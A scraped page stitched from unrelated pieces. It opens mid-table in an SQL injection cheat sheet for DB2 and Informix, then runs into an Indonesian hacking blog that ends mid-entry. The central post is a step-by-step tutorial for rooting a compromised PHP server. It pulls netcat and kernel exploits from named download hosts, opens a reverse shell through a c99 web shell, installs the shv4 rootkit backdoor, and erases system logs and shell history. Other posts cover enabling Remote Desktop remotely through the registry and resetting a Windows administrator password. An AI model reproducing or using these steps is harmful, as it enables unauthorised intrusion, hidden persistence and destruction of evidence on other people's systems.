Casting | SELECT cast(‘123′ as integer) FROM sysibm.sysdummy1; SELECT cast(1 as char) FROM sysibm.sysdummy1; |
String Concatenation | SELECT ‘a’ concat ‘b’ concat ‘c’ FROM sysibm.sysdummy1; — returns ‘abc’ select ‘a’ || ‘b’ from sysibm.sysdummy1; — returns ‘ab’ |
If Statement | TODO |
Case Statement | TODO |
Avoiding Quotes | TODO |
Time Delay | ???See Heavy Queries article for some ideas. |
Make DNS Requests | TODO |
Command Execution | TODO |
Local File Access | TODO |
Hostname, IP Address | TODO |
Location of DB files | TODO |
Default/System Databases | TODO |
Informix
Version | SELECT DBINFO(‘version’, ‘full’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ’server-type’) FROM systables WHERE tabid = 1; SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’) FROM systables WHERE tabid = 1; SELECT |
Comments | select 1 FROM systables WHERE tabid = 1; — comment |
Current User | SELECT USER FROM systables WHERE tabid = 1; select CURRENT_ROLE FROM systables WHERE tabid = 1; |
List Users | select username, usertype, password from sysusers; |
List Password Hashes | TODO |
List Privileges | select tabname, grantor, grantee, tabauth FROM systabauth join systables on systables.tabid = systabauth.tabid; — which tables are accessible by which users select procname, owner, grantor, grantee |
List DBA Accounts | TODO |
Current Database | SELECT DBSERVERNAME FROM systables where tabid = 1; — server name |
List Databases | select name, owner from sysdatabases; |
List Columns | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid; |
List Tables | select tabname, owner FROM systables; select tabname, viewtext FROM sysviews join systables on systables.tabid = sysviews.tabid; |
List Stored Procedures | select procname, owner FROM sysprocedures; |
Find Tables From Column Name | select tabname, colname, owner, coltype FROM syscolumns join systables on syscolumns.tabid = systables.tabid where colname like ‘%pass%’; |
Select Nth Row | select first 1 tabid from (select first 10 tabid from systables order by tabid) as sq order by tabid desc; — selects the 10th row |
Select Nth Char | SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1) FROM systables where tabid = 1; — returns ‘C’ |
Bitwise AND | select bitand(6, 1) from systables where tabid = 1; — returns 0 select bitand(6, 2) from systables where tabid = 1; — returns 2 |
ASCII Value -> Char | TODO |
Char -> ASCII Value | select ascii(‘A’) from systables where tabid = 1; |
Casting | select cast(‘123′ as integer) from systables where tabid = 1; select cast(1 as char) from systables where tabid = 1; |
String Concatenation | SELECT ‘A’ || ‘B’ FROM systables where tabid = 1; — returns ‘AB’ SELECT concat(‘A’, ‘B’) FROM systables where tabid = 1; — returns ‘AB’ |
String Length | SELECT tabname, length(tabname), char_length(tabname), octet_length(tabname) from systables; |
If Statement | TODO |
Case Statement | select tabid, case when tabid>10 then “High” else ‘Low’ end from systables; |
Avoiding Quotes | TODO |
Time Delay | TODO |
Make DNS Requests | TODO |
Command Execution | TODO |
Local File Access | TODO |
Hostname, IP Address | SELECT DBINFO(‘dbhostname’) FROM systables WHERE tabid = 1; — hostname |
Location of DB files | TODO |
Default/System Databases | These are the system databases: sysmaster sysadmin* sysuser* sysutils* * = don’t seem to contain anything / don’t allow reading |
Installing Locally | You can download Informix Dynamic Server Express Edition 11.5 Trial for Linux and Windows. |
Database Client | There’s a database client SDK available, but I couldn’t get the demo client working. I used SQuirreL SQL Client Version 2.6.8 after installing the Informix JDBC drivers (“emerge dev-java/jdbc-informix” on Gentoo). |
Logging in from command line | If you get local admin rights on a Windows box and have a GUI logon:
The set INFORMIXDIR=C:\PROGRA~1\IBM\IBMINF~1\11.50 set INFORMIXSERVER=testservername set ONCONFIG=ONCONFIG.testservername set set set DBTEMP=C:\PROGRA~1\IBM\IBMINF~1\11.50\infxtmp set CLIENT_LOCALE=EN_US.CP1252 set DB_LOCALE=EN_US.8859-1 set SERVER_LOCALE=EN_US.CP1252 set DBLANG=EN_US.CP1252 mode con codepage select=1252 |
Identifying on the network | My default installation listened on two TCP ports: 9088 and 9099. When I created a new “server name”, this listened on 1526/TCP by default. Nmap 4.76 didn’t identify these ports as Informix: $ sudo nmap -sS -sV 10.0.0.1 -p- -v –version-all … 1526/tcp open pdap-np? 9088/tcp open unknown 9089/tcp open unknown … TODO How would we identify Informix listening on the network? |
How to use local root exploit
by d0ntcry on Nov.22, 2009, under Tutorial
Tutorial by iLhaM BLoodroSE
How to use local root exploit
www.rosebanditz.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-
hy :-D
lgsg aja ya :haha:
bahan2 yang kamu butuhkan adalah :
*local.tgz -> download di http://d.rosebanditz.org
*NC -> download di http://d.rosebanditz.org
*target php (safe mode OFF)
*ssh account
*putty
@mengapa harus menggunakan ssh , dalam ngeroot ini
karena jika menggunakan shell target php , tidak bisa melakukan
bash command , bash command harus diaksses melalui ssh
the way is :
1. cari target php safe mode off yg firewallnya ga keblock
(cek port refused ato time out , kalo time out kemungkinan besar ga bisa connect pake NC )
2. buka putty kamu . login. terus masukin NC nya , (wget http://bloodrose.tk/download/exploit/nc ) kalo wget ga bisa pakai lwp-download , curl -O , kalo masih ga bisa pake winscp untuk mindah NC ke ssh kamu.
3. di ssh ketik chmod 777 nc / chmod +x nc
4. kembali pada target php gunakan backdoor c99 versi FaTaLisTiCz_Fx Fx29Sh v1 06.2008 c99 shell
download di : http://rosebanditz.tk/file/download.php?id=c74d97b01eae257e44aa9d5bade97baf
5. kembali pada putty aktifkan open port nc dengan command
./nc -lvp port misalnya ./nc -lpv 8910
6. lalu pada target php tadi dengan menggunakan backdoor tersebut
pilih backconnect gunakan isi port 8910 dan masukkan ip host dari putty kamu pilih perl lalu click connect kalo perl OFF gunakan C lalu connect
7. cek ssh kamu apabila sudah konek maka akan tersambung dengan
data2 ditarget php kamu
8. ready to war , sekarang kamu download local.tgz melalui ssh tadi yang sudah terkonek dengan shell target php , wget http://bloodrose.tk/download/exploit/local.tgz , sekali lagi kalo wget ga bisa masukkan pake lwp-download ato curl -O , kalo semisalnya masihg belum bisa masukan dengan download binary safe pada shell target php kamu
9. setelah sudah didownload ketik tar -zxvf local.tgz
10. masuk folder local dengan mengetik command cd local , lalu ketik ls -als untuk mengecek isinya
11. nah disinilah keberuntngan mulai bermain , cek kernel dengan command uname -a
12. tidak semua kernel bisa diexploit ( apalagi yg udah dipatch) hwhw
misalnya saja kita pake kernel 2.4.20 kebanyakn ini bisa di root pake exploit w00t pada local.tgz tadi jadi saat di folder local ketik ./w00t tunggu sebentar, dan wow you got the root ! :D , dan misalnya
ga pake kernel tersebut kamu bisa menggunakn exploit2 yang lain yang bisa kamu cek dengan google , ketik aja "local exploit kernel 2.4.40 misalnya , cari yg cocok lalu wget aja ke ssh kmu, misal berformat .c , misal , martha.c untuk mengexsprotnya ketik cc -o xpl martha.c , martha.c berganti dengan xpl lalu chmod +x xpl lgsg run ./xpl , tunggu aja beberapa saat lalu cek id jika id root u got the root!
13. setelah dapat root apa yang harus kita lakukan ?menginstal backdoor , saya selalu mengguhana shv untuk menginstall backdoor
saya menggunakan shv4.tar.gz , jadi commandnya sebagai berikut
pada putty kamu :
* download/upload it :
http://bloodrose.tk/download/exploit/shv4.tar.gz
* tar -zxvf shv4.tar.gz
* cd shv4
* ./setup password port
* finish :D
* cek portnya sudah accpeted apa belum kalo sudah acpted
login dengan putty pada port tersebut dan host ip tersebut
username : root password : passwordnya
14. menghapus jejak, menghapus jejak hoho mungkin banyak sekali tutor yg menjelaskan menghapus jejak , tapi saya sendiri tidak terlalu extrem menggunakan seperti itu
yg dimana namanya kita masuk tanpa izin pasti tercium juga baunya
hahaha, apalagi kalo kita gunakan root root itu dengan menginstal server , psy , bot misalnya. meskipun sudah disembunyikantetapi tetap terlihat juga (kebetulan saya pernah jadi sysadmin hehe)
tapi biasanya saya menggunakan juga command seperti ini :
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
15. sekarang terserah anda mo diapain root itu , tapi pesan saya
jangan merusak karena kasian sysadminya dan yg punya rootnya
karena mereka bekerja untuk itu , tapi ya terserah sih hak pribadi masing2 hoho :beer:
#################################
jika masih ada yg bingung bisa disampaikan disini
atau email ke admin@rosebanditz.org
sampe jumpa ditutorial berikutnya :semangat:
by iLhaM BLoodroSE
Membuat spoiler di blogspot
by d0ntcry on Nov.22, 2009, under Tutorial
Ne kodenya :
Membuat bot tanpa shell
by d0ntcry on Nov.22, 2009, under Koleksi, Tutorial
oke.. langsung aja..
1. Download windrop disini
2. Ekstrak di c:\ menjadi folder windrop -> c:\windrop
2. Cari file bot.cfg dan edit :
- set my-hostname "localhost" <-- biarin aja
- set my-ip "192.168.0.5" <-- ip komputer km : masuk cmd ketik ipconfig
- set nick "google" <-- nick bot km
- set owner "d0ntcry" <-- nick owner
- set basechan "#kompeni" <-- channel masuk pertama join
- set username "cry" <-- ident / user id
just it... okey..
3. masuk ke cmd > pindah ke direktori windrop > ketik eggdrop -m bot.cfg > enter
4. lihat di channel.. botnya udah join pa belom.. kalo udah msg bot ketik :
/msg
/msg
5. kalo belom join tolong dibaca pada saat meng-enter perintah eggdrop tadi.. script mana yg error...
6. komputer mati.. bot akan mati.. (Read error: Connection reset by peer)
7. matiin bot sama dengan matiin aplikasi yg berjalan di windows.. yaitu melalui task manager windows > cari eggdrop.exe > end process
8. menambah tcl :
- file tcl kamu taru' dulu di scripts (windrop/scripts)
- km tambahkan juga tulisan tambah tcl tadi di bot.cfg bawah sendiri :
source scripts/bulan.tcl
source scripts/hiburan.tcl
source scripts/.....????
- ada cara lain se... tapi mudahnya kaya gitu aja...
9. sudah ada tcl²nya dalam windrop yang saya edit ini.. silakan liat di bot.cfg
10. untuk mengedit tulisan² yang tampil di channel silakan edit d0ntcry.tcl di folder windrop/scripts dan edit servernya juga disitu ( bawah sendiri )
ok.. cukup gitu aja... ^^
kalo ada yang belum paham... silakan tanya langsung aja ya:D
#kompeni@irc.dal.net
Download tcl :
addsong.tcl
antiadvertise.tcl
astro.tcl
away.tcl
ccasbase.tcl
cerewet.tcl
ceriwis.tcl
chanprotect.tcl
chanrelay.tcl
deopcs.tcl
detik.tcl
family100
game4in1.tcl
gate.tcl
guard.tcl
http.tcl
ident.tcl
identify.tcl
idlechan.tcl
iplocator.tcl
jarak.tcl
joinflood.tcl
jump.tcl
kernel.tcl
lag.tcl
login.tcl
lucu.tcl
main.tcl
milan.tcl
mp3.tcl
nmap.tcl
novirii.tcl
optriggers.tcl
os.tcl
passchecker.tcl
passchk.tcl
profile.tcl
quitban.tcl
respon.tcl
say.tcl
sendmail.tcl
services.tcl
slap.tcl
statistics.tcl
stats.tcl
target.tcl
timebomb.tcl
translator.tcl
unload.tcl
whois.tcl
Aktifkan remote dekstop
by d0ntcry on Nov.22, 2009, under Tutorial
- Jalankan REGEDIT dari Start>Run
- Click File, lalu pilih Connect Network Registry
- Ketik IP address komputer yang ingin di remote atau nama komputernya, di Enter the object name to select dan klik OK.

4. Jika anda tidak punya izin mengakses remote komputer, akan muncul logon screen ketik username and password untuk remote komputer. kemudian klik OK.

6. Masuk ke HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server, di sebelah kanan panel, pilih fDenyTSConnection (REG_DWORD). Ubahlah value data dari 1(Remote Desktop disabled) ke 0 (Remote Desktop enabled).
7. Tutup regedit.
Regedit menggunakan TweakUI
by d0ntcry on Nov.22, 2009, under Tutorial
Pertama download dulu TweakUI yang masih berbentuk file zip. Kemudian ekstrak ke sembarang folder. Jika lancar akan terdapat empat buah file. Untuk menginstall caranya sebagai berikut :
- Klik kanan pada file tweakui.inf, pilih Install.
- Program akan meminta file tweakui.cnt. Klik aja pada Browse, dan arahkan ke letak folder tempat Anda menyimpan file tweakui.cnt.
- Klik OK, OK.
- Akan muncul window Help-nya Tweak UI. Tutup aja window tersebut, maka proses install akan segera dilanjutkan (jika Anda belum menutup window tersebut, maka proses install tidak akan dilanjutkan).
- Selesai.
ini ada yang lain dari microsoft untuk windows SP1 atau diatasnya... >> download <<
Struktur Registry
by d0ntcry on Nov.22, 2009, under Tutorial
1. HKEY_CLASSES_ROOT
Nama lain dari key ini adalah HKCR, key ini merupakan tempat dimana seluruh asosiasi file Windows disimpan, dan Windows akan mencari special folder type classes. Di dalam struktur, key ini identik dengan HKEY_LOCAL_MACHINE\ SOFTWARE\Classes.
2. HKEY_CURRENT_USER
Nama lain dari key ini adalah HKCU, key ini berisi informasi tentang user yang sedang log in pada saat itu. Terdiri atas subkey, antara lain: AppEvents, berisi setting untuk sound events. Control Panel, berisi setting control panel. InstallLocationMRU, berisi path/lokasi master Windows (waktu pertama kali menginstal Windows). Network, berisi informasi yang berhubungan dengan Network atau jaringan. Software, berisi tentang setting atau konfigurasi software untuk pemakai yang logon pada saat itu. RemoteAccess, berisi informasi tentang Dial up Networking.
3. HKEY_LOCAL_MACHINE
Nama lain dari key ini adalah HKLM, key ini berisi informasi tentang hardware dan setting software yang berlaku untuk semua user. Terdiri atas subkey, antara lain: Enum, berisi informasi tentang hardware, misalnya tentang monitor. Hardware, berisi informasi tentang port serial. Network, berisi informasi yang berhubungan dengan network untuk pemakai yang sedang aktif atau logon. Software, berisi informasi dan setting software.
4. HKEY_USERS
Nama lain dari key ini adalah HKU, key ini berisi informasi tentang desktop dan user setting untuk tiap user yang berhak login ke komputer tersebut. Tiap user mempunyai sebuah subkey. Jika hanya terdapat satu user, maka nama subkey tersebut adalah ".default".
5. HKEY_CURRENT_CONFIG
Nama lain dari key ini adalah HKCC, key ini berisi informasi tentang konfigurasi hardware, berhubungan dengan HKEY_LOCAL_MACHINE.
Foto profile facebook keren
by d0ntcry on Nov.22, 2009, under Tutorial
pengen kaya gitu???
download : gambar background profile fb dengan ukuran 200 x 600
kemudian km coba foto bergelantungan dan edit, bersihin semua sehingga hanya kelihatan badan km aja...
prikitiew...

Reset pass admin windows
by d0ntcry on Nov.22, 2009, under Tips, Tutorial
cuma mau share aja omz... pengalaman barusan aq coba 100% bisa!!!!
biasanya ctrl+alt+del2x dengan
username : administrator
pass : (dibiarkan kosong)
enter... dah masuk admin, itu kalo pada waktu install pertama kali windows admin dibiarkan kosong...
tapi kalo administrator windows kepassword gmn??masuk safe mode masi aja kepassword..
hemm.. setelah googling sana sini yang pke tools dgn cara brute force dkk...ktemu jalan kluarnya cukup dengan CD bootable windows xp ...
langsung aja..
1. di bios 1st Boot Device untuk boot melalui CDROM ( sama seperti nginstall windows )
2. enter any key trus F8
3. enter untuk setup xp
4. tekan R untuk repair
5. proses rapair .........
6. komputer ngrestart kemudiaann...
7. pada waktu installing windows tekan SHIFT + F10 untuk masuk cmd
8. ketik lusrmgr.msc atau nusrmgr.cpl trus reset dech password administrator...
tengkyu...
Perintah MIRC dalnet
by d0ntcry on Nov.22, 2009, under Tutorial
/msg nickserv@services.dal.net [command] [option] [sub-command]
atau dapat disingkat menjadi :
/ns [command] [option] [sub-command]
.:: REGISTER ::.
Penggunaan : /nickserv REGISTER password email
Keterangan : Perintah ini untuk mendaftarkan/me-Register nickname yang sedang kamu pakai berikut email kamu ke database DALnet (NickServ).
Catatan : Ingat !!! Password itu Case-Sensitive (membedakan antara huruf kapital dan huruf kecil). Setelah meregistrasikan nickname, kamu diwajibkan untuk mengonfirmasikan kembali registrasi nickname kamu dalam waktu 24 jam untuk mendapatkan akses penuh ke nickname kamu. Sebuah email berisi kode konfirmasi akan dikirimkan DALnet ke alamat email yang kamu gunakan pada saat registrasi. Oleh sebab itu sangat penting sekali bagi kamu untuk menggunakan email yang masih aktif/valid. Cara pengonfirmasian adalah menggunakan perintah AUTH atau melalui web-link di email yang kamu terima.
Contoh : /ns REGISTER passwordku d0ntcry@hackermail.com
Mendaftarkan suatu nickname dengan password passwordku dan email d0ntcry@hackermail.com
.:: AUTH ::.
Penggunaan : /nickserv AUTH nickname confirmation-code
Keterangan : Perintah ini gunanya untuk mengonfirmasikan kembali registrasi atau penggantian alamat email atau UnRegister nickname kamu. Sebuah email berisi kode konfirmasi akan dikirimkan DALnet ke alamat email yang kamu gunakan pada saat registrasi atau ke email baru kamu (pada proses perubahan alamat email). Ikuti petunjuk dalam email tersebut !
Catatan : Perintah ini hanya digunakan pada saat registrasi nickname dan pada saat merubah alamat email pada nickname yang sudah teregistrasi penuh (perintah SET - EMAIL) dan pada saat meng-UnRegister nickname (perintah DROP). Dalam tempo 24 jam kamu sudah harus memasukkan kode konfirmasi yang dikirimkan oleh DALnet ke email kamu atau nickname kamu akan kembali menjadi Un-Register (untuk nickname yang diregistrasi baru) atau alamat email nickname kamu akan kembali pada alamat email yang lama (untuk perubahan alamat email pada nickname) atau nickname kamu batal di-Drop oleh NickServ.
.:: IDENTIFY ::.
Penggunaan : /nickserv IDENTIFY password atau /nickserv IDENTIFY nickname password
Keterangan : Perintah yang pertama adalah untuk meng-Identify nickname yang sedang kamu gunakan, perintah yang kedua adalah untuk meng-Identify nickname yang tidak sedang kamu gunakan. Untuk pengguna irc client Mirc dapat langsung menggetikkan /identify password� atau /identify nickname password.
Catatan : Demi keamanan password kamu sendiri sangat dianjurkan untuk tidak menggetikkan identify password kamu di jendela channel atau private message. Ingatlah selalu untuk menggetikkan identify password kamu dan/atau perintah lainnya hanya di jendela Status.
Contoh #1 : /nickserv IDENTIFY passwordku
Meng-Identify nickname yang sedang kamu gunakan dengan password passwordku.
Contoh #2 : /nickserv IDENTIFY d0ntcry passwordku
Meng-Identify nickname d0ntcry dengan password passwordku.
.:: DROP ::.
Penggunaan : /nickserv DROP nickname
Keterangan : Perintah ini gunanya untuk meng-UnRegister suatu nickname.
Catatan : Proses UnRegister ini harus melalui 2 tahap. Pertama, menggunakan perintah DROP di atas. Kedua, menggunakan perintah AUTH untuk mengonfirmasikan proses UnRegister nickname. Setelah menggunakan perintah DROP, NikServ akan mengirimkan email berisi kode konfirmasi ke email kamu yang terdaftar pada database DALnet. Selanjutnya ikuti petunjuk yang terdapat di email tersebut.
Contoh : /nickserv DROP d0ntcry
Meng-UnRegister nickname d0ntcry.
.:: INFO ::.
Penggunaan : /nickserv INFO nickname
Keterangan : Perintah ini gunanya untuk mendapatkan informasi nickname seseorang, mulai dari tanggal registrasi, tanggal terakhir identify, alamat IP terakhir yang digunakan, alamat email, URL, dan opsi-opsi pada nickname tersebut.
.:: SET - PASSWD ::.
Penggunaan : /nickserv SET PASSWD oldpassword newpassword
Keterangan : Perintah ini untuk mengganti password nickname kamu.
Catatan : Kamu identify terlebih dahulu sebelum menggunakan perintah ini. Ingat !!! Password itu Case-Sensitive (membedakan antara huruf kapital dan huruf kecil).
Contoh : /nickserv SET PASSWD passwordku passanyar
Mengganti password nickname dari passwordku menjadi passanyar.
.:: SET - ENFORCE ::.
Penggunaan : /nickserv SET ENFORCE on|off
Keterangan : Perintah ini apabila di-set ke posisi on maka akan mencegah orang lain menggunakan nickname kamu. Nickserv akan memberikan batas waktu 60 detik untuk identify sebelum merubah nickname Enforce on menjadi Guest*****� dimana ***** adalah angka acak (random).
Catatan : Perintah SET ENFORCE ini dulunya dikenal dengan SET KILL.
.:: SET - URL ::.
Penggunaan : /nickserv SET URL [url_address]
Keterangan : Perintah ini untuk men-set URL (Uniform Resource Locator)/alamat Homepage nickname kamu. URL suatu nickname dapat dilihat dengan perintah INFO.
Catatan : Untuk menghapus/me-reset URL nickname kamu gunakan /nickserv SET URL.
Contoh : /nickserv SET URL http://d0ntcry.co.cc
Men-set http://d0ntcry.co.cc sebagai URL nickname kamu.
.:: SET - EMAIL ::.
Penggunaan : /nickserv SET EMAIL [new_email_address]
Keterangan : Perintah ini gunanya untuk mengganti alamat email nickname kamu.
Catatan : Setelah mengganti alamat email nickname, kamu diwajibkan untuk mengonfirmasikan kembali penggantian tersebut dengan perintah AUTH. DALnet akan mengirimkan email berisi kode konfirmasi ke alamat email baru tersebut. Perintah /nickserv SET EMAIL akan memunculkan email nickname kamu yang berada di database NickServ.
Contoh : /nickserv SET EMAIL d0ntcry@hackermail.com
Merubah alamat email menjadi d0ntcry@hackermail.com.
.:: SET - SHOWEMAIL ::.
Penggunaan : /nickserv SET SHOWEMAIL on|off
Keterangan : Perintah ini gunanya untuk menampilkan alamat email nickname kamu pada NickServ INFO.
Catatan : Pada keadaan default SHOWEMAIL berada pada posisi off.
.:: SET - NOMEMO ::.
Penggunaan : /nickserv SET NOMEMO on|off
Keterangan : Perintah ini apabila di-set pada posisi on maka akan mencegah seseorang mengirimkan memo via MemoServ kepada kamu.
Catatan : Biarpun NOMEMO pada posisi on, seorang IRCop ataupun suatu service DALnet tetap dapat mengirimkan memo kepada kamu.
.:: SET - NOOP ::.
Penggunaan : /nickserv SET NOOP on|off
Keterangan : Perintah ini apabila di-set pada posisi on maka akan mencegah seseorang menambahkan nickname kamu ke daftar AOP/SOP suatu channel.
Catatan : Setelah men-set NOOP on bila kamu menginginkan agar nickname kamu ditambahkan ke daftar AOP/SOP suatu channel, kamu cukup men-set NOOP off dan men-set NOOP on setelah nickname kamu masuk ke dalam daftar AOP/SOP.
.:: SET - MAILBLOCK ::.
Penggunaan : /nickserv SET MAILBLOCK on|off
Keterangan : Perintah ini apabila di-set pada posisi on maka kamu tidak akan dapat menggunakan perintah SENDPASS jika pada suatu saat kamu kehilangan/lupa pada password nickname kamu. Default MAILBLOCK adalah off.
Catatan : Perhatian !!! Sebelum men-set MAILBLOCK pada posisi on pastikan bahwa diri kamu tidak menderita penyakit lupa ingatan karena jika suatu saat kamu lupa/kehilangan password tidak seorangpun yang dapat menolong kamu.
.:: GHOST ::.
Penggunaan : /nickserv GHOST nickname password
Keterangan : Perintah ini gunanya untuk men-disconnect-kan suatu nickname dari IRC. Perintah ini digunakan jika terjadi situasi seperti ini : pada saat meninggalkan IRC kamu tidak logoff dengan benar ataupun koneksi IRC kamu terputus karena sesuatu alasan sehingga menyebabkan server IRC mengira kamu masih berada di IRC dan mempertahankan nickname kamu di IRC.
Catatan : Setelah menggunakan perintah GHOST selanjutnya gunakan perintah RELEASE.
Contoh : /nickserv GHOST d0ntcry passwordku
Men-Ghost nickname d0ntcry + password passwordku.
.:: RECOVER ::.
Penggunaan : /nickserv RECOVER nickname password
Keterangan : Perintah ini gunanya untuk men-disconnect-kan suatu nickname dari IRC. Perintah ini digunakan jika terjadi situasi seperti ini : ada orang lain menggunakan nickname kamu yang tidak di-set ENFORCE on.
Catatan : Setelah menggunakan perintah RECOVER selanjutnya gunakan perintah RELEASE. Sebenarnya perintah RECOVER dan GHOST mempunyai fungsi yang sama yaitu men-disconnect-kan suatu nickname dari IRC, saya sendiri tidak jelas mengapa DALnet menggunakan 2 perintah untuk sebuah fungsi yang sama.
Contoh : /nickserv RECOVER d0ntcry passwordku
Men-Recover nickname d0ntcry + password passwordku.
.:: RELEASE ::.
Penggunaan : /nickserv RELEASE nickname password
Keterangan : Perintah ini digunakan setelah perintah GHOST dan RECOVER.
Catatan : Setelah menggunakan perintah GHOST atau RECOVER pada suatu nickname, nickname tersebut akan diambil-alih selama beberapa menit oleh service DALnet (enforcer.dal.net). Perintah ini digunakan untuk meminta enforcer.dal.net agar membebaskan nickname yang bersangkutan.
Contoh : /nickserv RELEASE d0ntcry passwordku
Men-Release nickname d0ntcry + password passwordku.
.:: ACCESS - ADD | DEL | LIST | WIPE ::.
Penggunaan : /nickserv ACCESS ADD|DEL|LIST|WIPE [user@host mask]
Keterangan : Perintah ini digunakan pemilik suatu nickname untuk menambah daftar akses baru (ADD), menghapus daftar akses (DEL), menampilkan datfar akses (LIST) dan menghapus seluruh daftar akses (WIPE)..
Catatan : Apabila alamat IP kamu sekarang berada dalam daftar akses suatu nickname maka kamu dapat menggunakan nickname tersebut tanpa harus identify terlebih dahulu.
Contoh : /nickserv ACCESS ADD sct@si.dudut.info
Menambahkan alamat IP/user@host sct@si.dudut.info pada daftar akses nickname.
.:: ACC ::.
Penggunaan : /nickserv ACC nickname
Keterangan : Perintah ini digunakan untuk melihat hak akses suatu nickname. Berikut di bawah ini adalah definisi dari level hak akses (dalam angka) :
0 = Nickname yang bersangkutan belum di-Register.
1 = Pemakai nickname bersangkutan tidak identify pada NickServ (ini dapat terjadi pada nickname yang tidak di-set Enforce on).
2 = Alamat IP pemakai nickname bersangkutan berada di dalam daftar akses (Access) nickname tersebut.
3 = Pemakai nickname bersangkutan telah identify pada NickServ.
Contoh : /nickserv ACC d0ntcry
Melihat hak akses nick d0ntcry dan notify dari NickServ lebih kurang seperti di bawah ini :
-NickServ- d0ntcry ACC 1
.:: SENDPASS ::.
Penggunaan : /nickserv SENDPASS nickname emailaddress
Keterangan : Perintah ini gunanya untuk meminta NickServ mengirimkan password nickname kamu ke email.
Catatan : Alamat email yang kamu masukkan harus sama dengan alamat email nickname kamu yang terdaftar di database DALnet. Perintah SENDPASS tidak akan berfungsi apabila kamu men-set MAILBLOCK on.
Contoh : /nickserv SENDPASS d0ntcry d0ntcry@hackermail.com
Meminta NickServ untuk mengirimkan password nick d0ntcry ke email d0ntcry@hackermail.com.
============================================
Format penulisan perintah :
/msg chanserv@services.dal.net [command] [option] [sub-command]
atau dapat disingkat menjadi :
/cs [command] [option] [sub-command]
.:: REGISTER ::.
Penggunaan : /chanserv REGISTER #channel password description
Keterangan : Memerintahkan ChanServ untuk me-register suatu channel.
Catatan : Untuk meregister sebuah channel yang belum diregister kamu harus punya status @ (operator) di channel tersebut. Jangan memberitahukan password kepada orang lain, gunakan kombinasi abjad dan angka yang mudah kamu ingat tapi susah ditebak oleh orang lain.
Contoh : /chanserv REGISTER #kompeni menermenur dont flood my channel with your ego
Memerintahkan ChanServ untuk me-register channel #kompeni dengan password menermenur dan deskripsi dont flood my channel with your ego.
.:: DROP ::.
Penggunaan : /chanserv DROP #channel [dropcode]
Keterangan : Perintah ini untuk men-drop (un-register) sebuah channel. Gunakan /chanserv DROP #channel tanpa dropcode, tunggu konfirmasi dropcode dari chanserv dan masukkan perintah /chanserv DROP #channel [dropcode].
Catatan : Untuk menggunakan perintah ini kamu harus punya akses founder dan identify ke ChanServ.
Contoh : /chanserv DROP #kompeni
Perintah untuk men-drop channel #kompeni, setelah memasukkan perintah di atas tunggu di status kamu muncul konfirmasi dropcode dari ChanServ yang bentuknya seperti ini :
-ChanServ- Dropping a channel is permanent and cannot be undone!
-ChanServ- To confirm, type: /chanserv DROP #kompeni 13151683216
Selanjutnya silahkan ketik /chanserv DROP #kompeni 13151683216 dan selamat, kamu telah kehilangan sebuah channel kwekwekwek;p.
.:: IDENTIFY ::.
Penggunaan : /chanserv IDENTIFY #channel password atau /IDENTIFY #channel password
Keterangan : Perintah ini untuk meng-identify diri kamu sebagai founder channel dan perintah ini memberikan kamu hak akses penuh untuk menggunakan perintah yang hanya dapat digunakan oleh founder.
Contoh : /chanserv IDENTIFY #kompeni menermenur
Identify sebagai founder channel #kompeni dengan password channel menermenur.
.:: SENDPASS ::.
Penggunaan : /chanserv SENDPASS #channel email
Keterangan : Perintah ini digunakan founder untuk mengirimkan password channel ke email. Perintah ini berguna apabila founder lupa/kehilangan password channel.
Catatan : Password hanya akan dikirimkan oleh service DALnet apabila email yang diberikan pada perintah SENDPASS sama dengan email pada database DALnet. Email channel sama dengan email nick founder. Perintah SENDPASS dapat di-disable dengan perintah MAILBLOCK.
Contoh : /chanserv SENDPASS #kompeni d0ntcry@admin.kompeni-dal.net
Meminta ChanServ untuk mengirimkan password channel #kompeni ke email d0ntcry@admin.kompeni-dal.net.
.:: SOP - ADD | DEL | LIST | WIPE ::.
Penggunaan : /chanserv SOP #channel ADD|DEL|LIST|WIPE [nick|mask]
Keterangan : Perintah ini digunakan oleh founder untuk menambah SOP (SuperOperator) baru (ADD), menghapus SOP (DEL), menampilkan datfar SOP channel (LIST) dan menghapus seluruh SOP dari daftar (WIPE).
Catatan : Perintah ADD, DEL, WIPE hanya dapat digunakan oleh founder, perintah LIST dapat digunakan oleh level AOP ke atas. Daftar SOP dibatasi maksimum 100 entri.
Contoh : /chanserv SOP #kompeni ADD ketua_pengemis
Menambahkan nick ketua_pengemis ke dalam daftar SOP channel #kompeni.
.:: AOP - ADD | DEL | LIST | WIPE ::.
Penggunaan : /chanserv AOP #channel ADD|DEL|LIST|WIPE [nick|mask]
Keterangan : Perintah ini digunakan oleh founder dan SOP untuk menambah AOP (AutoOperator) baru (ADD), menghapus AOP (DEL), menampilkan datfar AOP channel (LIST) dan menghapus seluruh AOP dari daftar (WIPE).
Catatan : Perintah ADD dan DEL dapat digunakan oleh founder dan SOP, perintah LIST dapat digunakan oleh level AOP ke atas, perintah WIPE hanya dapat digunakan oleh founder. Daftar AOP dibatasi maksimum 300 entri.
Contoh : /chanserv AOP #kompeni ADD ketua_pengemis
Menambahkan nick ketua_pengemis ke dalam daftar AOP channel #kompeni.
.:: AKICK - ADD | DEL | LIST | WIPE ::.
Penggunaan : |DEL|LIST|WIPE [nick|mask|host]
